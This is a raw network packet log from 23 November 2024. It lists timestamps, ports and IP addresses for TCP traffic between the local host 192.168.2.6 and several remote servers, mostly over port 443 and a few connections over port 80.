Nov 23, 2024 07:09:38.811326981 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:38.957315922 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.957384109 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.957464933 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.959008932 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.959111929 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.961391926 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.962640047 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.962728024 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.965166092 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.971121073 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.971247911 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.971316099 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.077028036 CET	443	49824	2.16.158.75	192.168.2.6
Nov 23, 2024 07:09:39.077148914 CET	443	49824	2.16.158.75	192.168.2.6
Nov 23, 2024 07:09:39.077156067 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:39.077208996 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:39.094556093 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:39.094682932 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:39.094754934 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:39.183640003 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.183692932 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:39.183907986 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.184396029 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.184457064 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.184555054 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.187464952 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.187517881 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.187587023 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.188026905 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.188054085 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.191085100 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.191579103 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.191682100 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.193656921 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.204138994 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.204174042 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:39.207417011 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.207432985 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.210259914 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.210278034 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.211776018 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.211965084 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.212045908 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.221796036 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.221821070 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.222155094 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.222193956 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.224881887 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.224893093 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.224915028 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.224920034 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.226932049 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.226932049 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.226959944 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.226984024 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.228507042 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.228533983 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.228585958 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.228593111 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.229513884 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.229532957 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.229600906 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.229947090 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.229947090 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.229964972 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.229990959 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.230838060 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.230853081 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232189894 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232234001 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232328892 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232340097 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232387066 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232405901 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232492924 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232501984 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232806921 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232817888 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232950926 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232965946 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.232978106 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.232978106 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.233010054 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.233035088 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.233078003 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.235080957 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.235088110 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.235301971 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.235523939 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.235536098 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.237087965 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:39.237104893 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:39.255881071 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:39.375411034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:39.400305986 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:39.400327921 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:39.400393009 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:39.400419950 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:39.652671099 CET	443	49825	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:39.652755022 CET	49825	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:39.743335962 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.743380070 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.743520975 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.744051933 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.744110107 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.744168997 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.744385004 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.744399071 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.744652987 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:39.744673014 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:39.871973991 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.872081041 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:39.872172117 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.872622967 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:39.872662067 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.097647905 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.100419998 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.100440025 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.101008892 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.101027966 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.101058960 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.101066113 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.101102114 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.101178885 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.102030039 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.103247881 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.103354931 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.103471994 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.103480101 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.191082954 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.193568945 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:40.193727016 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:40.416150093 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.416512966 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.416562080 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.417610884 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.417696953 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.418994904 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.419087887 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.419418097 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.419434071 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.428073883 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.428438902 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.428453922 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.429567099 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.429640055 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.431243896 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.431320906 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.431755066 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.431762934 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.462935925 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.463251114 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.463268042 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.464715958 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.464775085 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.465764999 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.465847969 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.465976954 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.465984106 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.476053953 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.476279020 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.476311922 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.477329969 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.477395058 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.477754116 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.477817059 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.477936029 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.477945089 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.480102062 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.480333090 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.480348110 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.484540939 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.484596014 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.484982014 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.485044003 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.485160112 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.485167980 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.541806936 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.541867018 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.541868925 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.593259096 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.593367100 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.779731035 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:40.780077934 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780123949 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:40.780189037 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780252934 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780262947 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:40.780379057 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780468941 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780478954 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:40.780579090 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:40.780585051 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:40.793615103 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.797555923 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.797640085 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.797656059 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.809156895 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.809202909 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.809211016 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.818818092 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.818953037 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.818964005 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.831810951 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.832003117 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.832010984 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.845451117 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.845535040 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.845545053 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.845999002 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.846052885 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.846117973 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.846318960 CET	49841	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:40.846365929 CET	443	49841	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:40.858952999 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.859724045 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.859736919 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.860810041 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.860881090 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.861023903 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.861135006 CET	49843	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.861141920 CET	443	49843	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.899169922 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:40.906812906 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.906889915 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.907037020 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.907119036 CET	49842	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.907131910 CET	443	49842	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.917217016 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.917392969 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.917562962 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.917577028 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.917741060 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.919522047 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.919594049 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.919662952 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.919842005 CET	49845	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.919862986 CET	443	49845	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.922914028 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.922985077 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.923065901 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.923136950 CET	49844	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.923152924 CET	443	49844	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.925527096 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.988473892 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.994653940 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.998245001 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.998306036 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:40.998330116 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:40.999010086 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:40.999258041 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:40.999278069 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.000313044 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.000422955 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.000869036 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.000932932 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.007715940 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.007786036 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.007797956 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.011917114 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.012906075 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.014914036 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.014928102 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.015363932 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.015369892 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.015666008 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.015680075 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.015964031 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.016010046 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.016030073 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.016181946 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.016243935 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.016897917 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.016901970 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.017431974 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.017467976 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.017810106 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.017815113 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.018271923 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.018290043 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.018899918 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.018907070 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.019191980 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.019470930 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.019486904 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.020421028 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.020428896 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.028805971 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.029093981 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.029119015 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.042428017 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.042495012 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.042504072 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.045386076 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.045685053 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.045695066 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.047102928 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.047221899 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.047523975 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.047615051 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.056174040 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.056231022 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.056242943 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.069806099 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.069904089 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.069914103 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.083415031 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.083482981 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.083489895 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.089143038 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.089152098 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.096620083 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.096695900 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.096704006 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.107981920 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.108036995 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.108043909 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.119709969 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.119813919 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.119822025 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.131491899 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.131536961 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.131545067 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.143455029 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.143515110 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.143522024 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.169549942 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.169608116 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.169615984 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.174031019 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.174052000 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:41.174060106 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.174107075 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.174114943 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.174165964 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.174441099 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:41.174508095 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:41.175879955 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:41.175962925 CET	49854	443	192.168.2.6	172.64.41.3
